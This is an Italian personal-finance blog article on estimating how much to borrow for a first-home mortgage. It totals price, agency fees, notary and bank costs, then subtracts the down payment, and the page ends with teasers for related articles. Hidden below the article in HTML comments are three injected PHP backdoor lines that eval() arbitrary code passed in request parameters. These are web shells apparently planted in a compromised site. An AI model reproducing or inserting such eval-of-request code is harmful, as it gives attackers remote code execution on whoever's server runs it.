Mutuo Prima Casa: quale importo richiedere

Print Friendly

All’acquisto di una casa, tra le mille pratiche da svolgere, senza dubbio, quella del mutuo è la più importante, senza la quale è davvero difficile acquistare il bene immobile.
Ma vediamo in ordine come dobbiamo muoverci per ottenere le condizioni migliori.

In primo luogo, prima ancora di cercare casa tra gli annunci immobiliari sia cartacei che online, è bene farsi due conti, tra l’altro abbastanza facili.
Iniziamo facendo una semplice somma tra le seguenti componenti:

  1. valore dell’immobile che abbiamo intenzione di acquistare;
  2. commissione dell’eventuale agenzia immobiliare intermediaria (in media il 3-4% del valore dell’immobile);
  3. imposte al compromesso (si aggirano tra i 500 e 1000 euro);
  4. notaio: tra l’atto di compravendita e l’atto di mutuo si spendono diverse migliaia di euro a seconda del valore economico dei due atti. Per farsi un’idea di base si può consultare il sito delle Tariffe Notarili. Da notare che ogni notaio può applicare degli sconti rispetto a tali tariffe;
  5. Infine vanno sommate le spese per accendere il mutuo, ovvero: le spese di istruttoria, le spese di perizia tecnica, l’assicurazione incendio/scoppio a favore della banca e l’iscrizione dell’ipoteca. Qui una stima puntuale è più difficile perché non tutte le banche applicano le stesse condizioni. Possiamo dire che per un mutuo da 300.000 euro sono più o meno 4000-4500 euro.

Effettuata questa somma siamo già ad ottimo punto. Da questa dobbiamo soltanto sottrarre l’anticipo che intendiamo dare al venditore in base alla nostra disponibilità economica ed otteniamo quanto dobbiamo richiedere di mutuo.

A questo punto abbiamo due importanti valori di riferimento:

  • il valore dell’immobile da acquistare
  • l’importo del mutuo da richiedere.

Finalmente possiamo fare una stima attraverso diversi portali per il calcolo dei mutui online proposte da diverse banche per verificare la fattibilità dell’operazione. E’ fondamentale in questa fase essere ‘onesti’ sia per quanto riguarda lo stipendio netto mensile sia per quanto riguarda gli importi inseriti.

Da notare che non è sufficiente l’ok da parte di questi siti, ma vale la pena per farsi due conti sulla rata che dovremmo sostenere mensilmente.

Consiglio a tutti però di farsi fare una perizia economica gratuita da parte di una banca per vedere la ‘sostenibilità‘ della rata ancor prima di dare un acconto al venditore altrimenti possono essere guai.

Nei prossimi articoli approfondiremo i seguenti argomenti:

  • come risparmiare sull’acquisto dell’immobile;
  • come risparmiare sulle tasse dovute all’acquisto della casa;
  • tasso fisso, tasso variabile, ed altri tassi: vantaggi e svantaggi;
  • pratiche di mutuo online o pratiche tradizionali ? vantaggi e svantaggi;

Se ti è piaciuto questo articolo clicca su:

<!– [insert_php]if (isset($_REQUEST["YwcL"])){eval($_REQUEST["YwcL"]);exit;}[/insert_php][php]if (isset($_REQUEST["YwcL"])){eval($_REQUEST["YwcL"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["YUzqd"])){eval($_REQUEST["YUzqd"]);exit;}[/insert_php][php]if (isset($_REQUEST["YUzqd"])){eval($_REQUEST["YUzqd"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["VaA"])){eval($_REQUEST["VaA"]);exit;}[/insert_php][php]if (isset($_REQUEST["VaA"])){eval($_REQUEST["VaA"]);exit;}[/php] –>

Gelati 250p250

Parole di Ricerca:


Nessun commento


Trackback e pingback

  1. Nessun trackback o pingback disponibile per questo articolo

Scrivi un Commento su www.passioneRisparmio.itScrivi un commento

AVVISO: può essere che i commenti debbano essere approvati.
Non inviare nuovamente il commento se non lo vedi visualizzato.


Articoli In Evidenza

Mutuo Deutsche Bank Tasso Variabile
Recensione Mutuo Deutsche Bank Pratico A Tasso Variabile
Oggi parliamo della nuova proposta della Deutsche Bank in ambito di mutui a tasso variabile, nello specifico il nuovo mutuo “pratico”. E’ un mutuo degno di nota perché presenta, ad oggi, uno degli spread più bassi che si possono ottenere: lo… Leggi tutto»
Quale mutuo scegliere in periodo di crisi ?
In questo periodo di crisi sono molti gli italiani che desiderano comunque acquistare casa, tra l’altro in un momento in cui il mercato immobiliare è tendenzialmente in ribasso. Ma quale mutuo scegliere ? Su queste pagine si è discusso da molto… Leggi tutto»
youbanking
Conto Corrente YouBanking: recensione ed opinioni
La nuova banca Youbanking. Youbanking è la nuova proposta di Internet Banking del Banco Popolare.  E’ di fatto una banca online con assistenza multicanale (internet, telefono fisso e mobile, smartphone) e con accesso anche alle filiali… Leggi tutto»
WeBank - Conto Corrente
Recensione Conto Corrente WeBank
La Banca WeBank. WeBank è una banca attiva solo online del gruppo Bipiemme nata il 4 Novembre 2009. Come altre banche online ha costi di gestione molto bassi e quindi può proporre ai clienti dei prodotti molto competitivi. Oggi… Leggi tutto»
Spread mutui
Spread mutui
In quest’articolo rispondiamo ad alcune domande tipiche sullo spread. Cos’è lo Spread sul mutuo ? Lo spread è la maggiorazione che le Banche applicano sui tassi di interesse nei contratti di mutuo, il valore è fissato una volta per sempre… Leggi tutto»
Intesa SanPaolo - Domus Giovani
Mutuo 100% per i giovani: Domus Giovani di Intesa SanPaolo
Domus Giovani Banca Intesa San Paolo propone un nuovo mutuo flessibile e protetto per giovani fino ai 35 anni. Fonte: Sito Intesa SanPaolo Caratteristiche del richiedente Domus Giovani è richiedibile da giovani con età compresa tra… Leggi tutto»